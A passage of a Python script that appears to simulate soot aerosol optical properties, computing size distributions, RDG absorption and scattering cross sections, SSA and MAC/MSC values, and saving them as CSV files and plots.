Primary Diameter Sigma Loop\n\n Sample_D_Median = Sample_D_Median_List[i1]\n Sample_Sigma = Sample_Sigma_List[i2]\n Eff_dm = Eff_dm_List[i3]\n Eff_rho_100nm = Eff_rho_100nm_List[i4]\n Primary_Sigma_da_CTE = Primary_Sigma_da_CTE_List[i6]\n\n Eff_k = FN.Effective_Density_K_FromRho100nm(Eff_dm, Eff_rho_100nm)\n Primary_D_TEM = FN.DTEM_FromEffectiveDensity_D_Alpha(Primary_D_Alpha, Eff_dm)\n Primary_Diameter_100nm = FN.Primary_dp100nm(Eff_rho_100nm, Primary_K_Alpha, Soot_Material_Density, Primary_D_Alpha)\n\n Counter += 1\n\n Situation = f\"S_Median Diameter={round(Sample_D_Median, 1)} (nm)- S_Sigma={round(Sample_Sigma, 1)}- Dm={round(Eff_dm, 2)}- k={round(Eff_k, 2)}- rho_100nm={round(Eff_rho_100nm, 1)}- D_TEM={round(Primary_D_TEM, 2)}- P100nm_Diam={round(Primary_Diameter_100nm * 10 ** 9, 1)} (nm)- P_Sigma={round(Primary_Sigma_da_CTE, 2)}\"\n Save_Situation.append(Situation)\n Graph_Folder_Situation = Graph_Folder + \"/\" + Situation\n\n Diameter_Meter, Diameter_Log, Diameter_Nano = FN.Bins_LogN_Distributed(Median_Diameter=Sample_D_Median * (10 ** (-9)), Sigma_G=Sample_Sigma, Sigma_G_Bound=Sample_Sigma_Bound, Total_Number_Bins=Sample_Sigma_Bins)\n\n LogN_Sample_SizeDistribution_Plain = []\n LogN_Sample_SizeDistribution = []\n\n Save_Diameter[Situation] = Diameter_Nano[:-1]\n\n SUM = 0\n SUM1 = 0\n logging.info(f\"Sample's particle bins generated:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {Diameter_Nano}\")\n\n ########## Number Concentration\n\n for k in range(Sample_Sigma_Bins - 1):\n LogN_Sample_SizeDistribution_Plain.append(FN.LogN_Distribution(Median=Sample_D_Median, SigmaG=Sample_Sigma, Dp2=Diameter_Nano[k + 1], Dp1=Diameter_Nano[k]))\n LogN_Sample_SizeDistribution.append(LogN_Sample_SizeDistribution_Plain[k] * Sample_Total_Number_Concentration)\n SUM += LogN_Sample_SizeDistribution_Plain[k]\n SUM1 += LogN_Sample_SizeDistribution[k]\n\n logging.info(f\"Sample's particle bins populated:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {LogN_Sample_SizeDistribution_Plain}\")\n logging.info(f\"LogNormal Check:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {SUM}: {SUM1}\")\n\n Save_LogN_Sample_SizeD[Situation] = LogN_Sample_SizeDistribution\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"NumberConcentration\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=LogN_Sample_SizeDistribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"Number Concentration,\\nTotal Conc.= \" + str(round(Sample_Total_Number_Concentration, 1)), Y_label1=Y_LabelA1,\n Plot_Title=Situation)\n\n ########## Primary Particle Size\n\n Soot_Primary_Diameter_Median_meter = []\n Soot_Primary_Diameter_Median_Nano = []\n for k in range(Sample_Sigma_Bins - 1):\n Soot_Primary_Diameter_Median_meter.append(FN.Primary_Particle_Size_meter(dm_meter=Diameter_Meter[k], dp100_meter=Primary_Diameter_100nm, Dtem=Primary_D_TEM))\n Soot_Primary_Diameter_Median_Nano.append(Soot_Primary_Diameter_Median_meter[k] * 10 ** 9)\n logging.info(f\"Primary Particle Diameter(m):{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {Soot_Primary_Diameter_Median_Nano}\")\n\n Save_Soot_Primary_Diameter_Median_Nano[Situation] = Soot_Primary_Diameter_Median_Nano\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"PrimaryPS\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Soot_Primary_Diameter_Median_Nano, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, Y_Min=Primary_Y_Min, Y_Max=Primary_Y_Max, X_Label=X_LabelA1, Y_Legend=\"Primary Particle Size\", Y_label1=Y_LabelA2, Plot_Title=Situation)\n\n ########## Finding Primary Particle Number and Size\n\n Primary_Diameter_Bank = []\n Primary_Number_Bank = []\n Primary_Probability_Bank = []\n Aggregate_Mass_Bank = []\n\n SUM2 = []\n for k in range(Sample_Sigma_Bins - 1):\n SUM_Temp = 0\n Primary_Diameter, Primary_Number, Primary_Probability, Aggregate_Mass_array = FN.Primary_LogN_Generator_Mass(dp_Median_meter=Soot_Primary_Diameter_Median_meter[k], Sigma_g_Primary=Primary_Sigma_da_CTE, Sigma_g_Number=Primary_Sigma_da_CTE_Bound, Number_Points=Primary_Sigma_da_CTE_Nt, da_meter=Diameter_Meter[k],\n Eff_dm=Eff_dm, Eff_k=Eff_k, rho_cte=Soot_Material_Density)\n Primary_Diameter_Bank.append(Primary_Diameter)\n Primary_Number_Bank.append(Primary_Number)\n Primary_Probability_Bank.append(Primary_Probability)\n Aggregate_Mass_Bank.append(Aggregate_Mass_array)\n\n for m in range(len(Primary_Probability)):\n SUM_Temp += Primary_Probability[m]\n SUM2.append(SUM_Temp)\n logging.debug(f\"Primary Particle Diameter(m):{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {Primary_Diameter}\")\n logging.debug(f\"Primary Particle Number:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {Primary_Number}\")\n # FN.Fig_Plot_3D_Show_XCte(Diameter_Nano[:-1], Primary_Diameter_Bank, Primary_Probability_Bank)\n logging.info(f\"Primary Particle Probability Check:{Situation}:Sigma Bound:{Sample_Sigma_Bound}: {SUM2}\")\n\n Save_Primary_Diameter_Bank[Situation] = Primary_Diameter_Bank\n Save_Primary_Number_Bank[Situation] = Primary_Number_Bank\n Save_Primary_Probability_Bank[Situation] = Primary_Probability_Bank\n\n ########### Absorption RDG\n\n Absorption_Cross_Section_Sample = []\n Absorption_Cross_Section = 0\n Absorption_Cross_Section_Sample_dlnDp = []\n\n for k in range(Sample_Sigma_Bins - 1):\n Absorption_Cross_Section_Specific_Particle_Size = 0\n for p in range(Primary_Sigma_da_CTE_Nt - 1):\n Absorption_Cross_Section_Agg = FN.RDG_Absorption(K=Wave_Number, N=Primary_Number_Bank[k][p], Dp=Primary_Diameter_Bank[k][p], E=Soot_EM) # within aggregate\n Absorption_Cross_Section_Specific_Particle_Size += Absorption_Cross_Section_Agg * Primary_Probability_Bank[k][p]\n\n ABS = Absorption_Cross_Section_Specific_Particle_Size * LogN_Sample_SizeDistribution[k]\n # Absorption_Cross_Section_Sample_dlnDp.append(ABS / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Absorption_Cross_Section_Sample_dlnDp.append(ABS / (LogN_Sample_SizeDistribution[k]))\n Absorption_Cross_Section_Sample.append(ABS)\n Absorption_Cross_Section += ABS\n\n Save_Absorption_Cross_Section_Sample_dlnDp[Situation] = Absorption_Cross_Section_Sample_dlnDp\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"ABSCross\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Absorption_Cross_Section_Sample_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1,\n Y_Legend=\"Absorption Cross Section=\\n\" + str(round(Absorption_Cross_Section * 10 ** 12, 2)) + \" um\" + \"$^{}$\".format(2), Y_label1=Y_LabelA3,\n Plot_Title=Situation)\n ########### Absorption EFF\n\n Absorption_Efficiency_Sample = []\n # Absorption_Efficiency_Sample_dlnDp = []\n\n for k in range(Sample_Sigma_Bins - 1):\n Absorption_Efficiency_Sample.append(FN.Abs_Scatt_Eff(CrossSection=Absorption_Cross_Section_Sample[k] / LogN_Sample_SizeDistribution[k], dm=Diameter_Meter[k]))\n # Absorption_Efficiency_Sample_dlnDp.append(Absorption_Efficiency_Sample[k])\n\n Save_Absorption_Efficiency_Sample[Situation] = Absorption_Efficiency_Sample\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"ABSEff\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Absorption_Efficiency_Sample, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"Absorption Efficiency\", Y_label1=Y_LabelA4, Plot_Title=Situation)\n\n ########### Scattering RDG\n ########### Differential\n\n Differential_Scattering_Cross_Section_Full = []\n Differential_Scattering_Cross_Section_Full_dlnDp = []\n Scattering_Cross_Section_Diff_Tot = 0\n qDp_Full = []\n for k in range(Sample_Sigma_Bins - 1):\n qDp_Temp = []\n Differential_Scattering_Cross_Section_T = 0\n for t in range(Theta_Number):\n q = FN.Scattering_Wave_Vector(WaveLength_meter=Wave_Length, Theta_radian=Theta_Radian[t])\n qDp_Temp.append(q * Soot_Primary_Diameter_Median_meter[k])\n Differential_Scattering_Cross_Section_Specific_Particle_Size = 0\n for p in range(Primary_Sigma_da_CTE_Nt - 1):\n Differential_Scattering_Cross_Section_Agg = FN.RDG_Def_Scattering(K=Wave_Number, N=Primary_Number_Bank[k][p], Dp=Primary_Diameter_Bank[k][p], q=q, F=Soot_FM, D_RDG=Soot_Fractal_D_mc_RDG, K_RDG=Soot_Prefactor_k_mc_RDG, Formula=2)\n Differential_Scattering_Cross_Section_Specific_Particle_Size += Differential_Scattering_Cross_Section_Agg * Primary_Probability_Bank[k][p]\n\n Differential_Scattering_Cross_Section_T += FN.Diff_Integral_Phi(Differential_Scattering_Cross_Section_Specific_Particle_Size, Phi_Radian, Theta_Radian[t], Theta_Diff, Phi_Diff)\n\n qDp_Full.append(qDp_Temp)\n Diff_Scatter = Differential_Scattering_Cross_Section_T * LogN_Sample_SizeDistribution[k]\n Differential_Scattering_Cross_Section_Full.append(Diff_Scatter)\n # Differential_Scattering_Cross_Section_Full_dlnDp.append(Diff_Scatter / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Differential_Scattering_Cross_Section_Full_dlnDp.append(Diff_Scatter / (LogN_Sample_SizeDistribution[k]))\n Scattering_Cross_Section_Diff_Tot += Diff_Scatter\n\n Save_Differential_Scattering_Cross_Section_Full_dlnDp[Situation] = Differential_Scattering_Cross_Section_Full_dlnDp\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"ScatterDiffCross\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Differential_Scattering_Cross_Section_Full_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1,\n Y_Legend=\"Total Scattering Cross Section (Differential)=\\n\" + str(round(Scattering_Cross_Section_Diff_Tot * 10 ** 12, 2)) + \" um\" + \"$^{}$\".format(2), Y_label1=Y_LabelA6, Plot_Title=Situation)\n\n ########### Scattering EFF\n\n Scattering_Efficiency_Sample = []\n # Scattering_Efficiency_Sample_dlnDp = []\n\n for k in range(Sample_Sigma_Bins - 1):\n Scattering_Efficiency_Sample.append(FN.Abs_Scatt_Eff(CrossSection=Differential_Scattering_Cross_Section_Full[k] / LogN_Sample_SizeDistribution[k], dm=Diameter_Meter[k]))\n # Scattering_Efficiency_Sample_dlnDp.append(Scattering_Efficiency_Sample[k])\n\n Save_Scattering_Efficiency_Sample[Situation] = Scattering_Efficiency_Sample\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"Scattering_Eff\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Scattering_Efficiency_Sample, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"Scattering Efficiency\", Y_label1=Y_LabelA5, Plot_Title=Situation)\n\n ########### SSA Distribution\n\n SSA = []\n\n for k in range(Sample_Sigma_Bins - 1):\n SSA.append(FN.SSA_Calculator(Scattering_CS=Differential_Scattering_Cross_Section_Full[k], Absorption_CS=Absorption_Cross_Section_Sample[k]))\n # Scattering_Efficiency_Sample_dlnDp.append(Scattering_Efficiency_Sample[k])\n\n Save_SSA_Distribution[Situation] = SSA\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"SSA\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=SSA, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"SSA\", Y_label1=Y_LabelA9, Plot_Title=Situation)\n\n ########### Total Scattering\n\n Scattering_Cross_Section_Total_Distribution = []\n Scattering_Cross_Section_Total_Distribution_dlnDp = []\n Scattering_Cross_Section_Total = 0\n for k in range(Sample_Sigma_Bins - 1):\n\n Scattering_Cross_Section_Total_Specific_Particle_Size = 0\n for p in range(Primary_Sigma_da_CTE_Nt - 1):\n Scattering_Cross_Section_Total_Agg = FN.RDG_Total_Scattering(K=Wave_Number, N=Primary_Number_Bank[k][p], Dp=Primary_Diameter_Bank[k][p], F=Soot_FM, D_RDG=Soot_Fractal_D_mc_RDG, K_RDG=Soot_Prefactor_k_mc_RDG, Formula=2)\n Scattering_Cross_Section_Total_Specific_Particle_Size += Scattering_Cross_Section_Total_Agg * Primary_Probability_Bank[k][p]\n\n Total_Scatter = Scattering_Cross_Section_Total_Specific_Particle_Size * LogN_Sample_SizeDistribution[k]\n Scattering_Cross_Section_Total_Distribution.append(Total_Scatter)\n Scattering_Cross_Section_Total_Distribution_dlnDp.append(Total_Scatter / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Scattering_Cross_Section_Total += Total_Scatter\n\n Save_Scattering_Cross_Section_Total_Distribution_dlnDp[Situation] = Scattering_Cross_Section_Total_Distribution_dlnDp\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"ScatterTotCross\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Scattering_Cross_Section_Total_Distribution_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1,\n Y_Legend=\"Scattering Cross Section (Total)=\\n\" + str(round(Scattering_Cross_Section_Total * 10 ** 12, 2)) + \" um\" + \"$^{}$\".format(2),\n Y_label1=Y_LabelA6, Plot_Title=Situation)\n\n ########### MAC_MSC\n\n Mass_Sample_1 = []\n Mass_Sample_2 = []\n Density = []\n Total_Mass_1 = 0\n Total_Mass_2 = 0\n\n Aggregate_Mass_Ave1 = []\n Aggregate_Mass_Ave2 = []\n MAC_Distribution = []\n MSC_Distribution = []\n\n for k in range(Sample_Sigma_Bins - 1):\n Density.append(FN.Effective_Density(K=Eff_k, Dm=Eff_dm, da=Diameter_Meter[k]))\n Aggregate_Mass_Ave1.append(FN.Mass_Calc(rho=Density[k], da=Diameter_Meter[k]))\n Mass_Aggregate_Ave = 0\n for p in range(Primary_Sigma_da_CTE_Nt - 1):\n Mass_Aggregate_Ave += Aggregate_Mass_Bank[k][p] * Primary_Probability_Bank[k][p]\n Aggregate_Mass_Ave2.append(Mass_Aggregate_Ave)\n\n MAC_Distribution.append(Absorption_Cross_Section_Sample[k] / (Aggregate_Mass_Ave2[k] * LogN_Sample_SizeDistribution[k] * 1000))\n MSC_Distribution.append(Differential_Scattering_Cross_Section_Full[k] / (Aggregate_Mass_Ave2[k] * LogN_Sample_SizeDistribution[k] * 1000))\n\n Mass_Effective1 = Aggregate_Mass_Ave1[k] * LogN_Sample_SizeDistribution[k]\n Mass_Effective2 = Aggregate_Mass_Ave2[k] * LogN_Sample_SizeDistribution[k]\n\n Mass_Sample_1.append(Mass_Effective1 / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Mass_Sample_2.append(Mass_Effective2 / (log(Diameter_Nano[k + 1]) - log(Diameter_Nano[k])))\n Total_Mass_1 += Mass_Effective1\n Total_Mass_2 += Mass_Effective2\n\n Total_Mass_1 = Total_Mass_1 * 1000 # kg to g\n Total_Mass_2 = Total_Mass_2 * 1000 # kg to g\n\n MAC_1 = Absorption_Cross_Section / Total_Mass_1\n MSC_1 = Scattering_Cross_Section_Total / Total_Mass_1\n MSC_Diff_1 = Scattering_Cross_Section_Diff_Tot / Total_Mass_1\n SSA = Scattering_Cross_Section_Diff_Tot / (Scattering_Cross_Section_Diff_Tot + Absorption_Cross_Section)\n\n MAC_2 = Absorption_Cross_Section / Total_Mass_2\n MSC_2 = Scattering_Cross_Section_Total / Total_Mass_2\n MSC_Diff_2 = Scattering_Cross_Section_Diff_Tot / Total_Mass_2\n\n Save_Effective_Density[Situation] = Density\n Save_Mass_Sample_1[Situation] = Mass_Sample_1\n Save_Mass_Sample_2[Situation] = Mass_Sample_2\n Save_MAC_Distribution[Situation] = MAC_Distribution\n Save_MSC_Distribution[Situation] = MSC_Distribution\n Save_MAC[Situation] = str(MAC_1) + \", \" + str(MAC_2)\n Save_MSC_Total[Situation] = str(MSC_1) + \", \" + str(MSC_2)\n Save_MSC_Diff[Situation] = str(MSC_Diff_1) + \", \" + str(MSC_Diff_2)\n Save_SSA[Situation] = SSA\n\n if Figure_Enable == 1:\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"EffectiveDensity\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Density, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA8, Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"Aggregate_Mass_Ave1\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Aggregate_Mass_Ave1, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB1, Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"Aggregate_Mass_Ave2\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Aggregate_Mass_Ave2, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB2, Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"MAC_Distribution\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=MAC_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB3, Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"MSC_Distribution\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=MSC_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB4, Plot_Title=Situation)\n\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"MassDistribution1\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Mass_Sample_1, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_Legend=\"MAC=\" + str(round(MAC_1, 2)) + \"\\n\" + \"MSC=\" + str(round(MSC_1, 2)) + \"\\n\" + \"MSC-Diff=\" + str(round(MSC_Diff_1, 2)),\n Y_label1=Y_LabelA7,\n Plot_Title=Situation)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder_Situation, FileName=str(Counter) + \"_\" + \"MassDistribution2\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Linear(Address=Address, X_Array=Diameter_Nano[:-1], Y_array=Mass_Sample_2, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1,\n Y_Legend=\"MAC=\" + str(round(MAC_2, 2)) + \"\\n\" + \"MSC=\" + str(round(MSC_2, 2)) + \"\\n\" + \"MSC-Diff=\" + str(round(MSC_Diff_2, 2)),\n Y_label1=Y_LabelA7, Plot_Title=Situation)\n\n ################# SAVING\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Sample_Agggregate_Size\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Diameter)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Sample_SizeDistribution\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_LogN_Sample_SizeD, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA1, Plot_Title=\"Number Concentration\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Sample_SizeDistribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_LogN_Sample_SizeD)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Soot_Primary_Diameter_Median\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Soot_Primary_Diameter_Median_Nano, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA2, Plot_Title=\"Primary Particle Diameter\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Soot_Primary_Diameter_Median\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Soot_Primary_Diameter_Median_Nano)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Primary_Diameter_Distribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Primary_Diameter_Bank)\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Primary_Number_Distribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Primary_Number_Bank)\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Primary_Probability_Distribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Primary_Probability_Bank)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Absorption_Cross_Section_Sample\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Absorption_Cross_Section_Sample_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA3, Plot_Title=\"Total Absorption Cross Section\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Absorption_Cross_Section_Sample\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Absorption_Cross_Section_Sample_dlnDp)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Absorption_Efficiency_Sample\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Absorption_Efficiency_Sample, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA4, Plot_Title=\"Absorption Efficiency\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Absorption_Efficiency_Sample\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Absorption_Efficiency_Sample)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Differential_Scattering_Cross_Section\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Differential_Scattering_Cross_Section_Full_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA6, Plot_Title=\"Scattering Cross Section_ Diff\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Differential_Scattering_Cross_Section\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Differential_Scattering_Cross_Section_Full_dlnDp)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Scattering_Efficiency\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Scattering_Efficiency_Sample, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA5, Plot_Title=\"Scattering Efficiency\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Scattering_Efficiency\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Scattering_Efficiency_Sample)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"SSA\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_SSA_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA9, Plot_Title=\"SSA Distribution\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"SSA\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_SSA_Distribution)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Scattering_Cross_Section_Total\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Scattering_Cross_Section_Total_Distribution_dlnDp, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA6, Plot_Title=\"Scattering Cross Section_ Total\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Scattering_Cross_Section_Total\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Scattering_Cross_Section_Total_Distribution_dlnDp)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Effective_Density\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Effective_Density, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA8, Plot_Title=\"Effective Density\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Effective_Density\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Effective_Density)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Mass_Sample_Effective_Density\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Mass_Sample_1, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA7, Plot_Title=\"Mass Distribution using Effective Density\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Mass_Sample_Effective_Density\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Mass_Sample_1)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"MAC_Distribution\", Extension=\"jpg\")\n 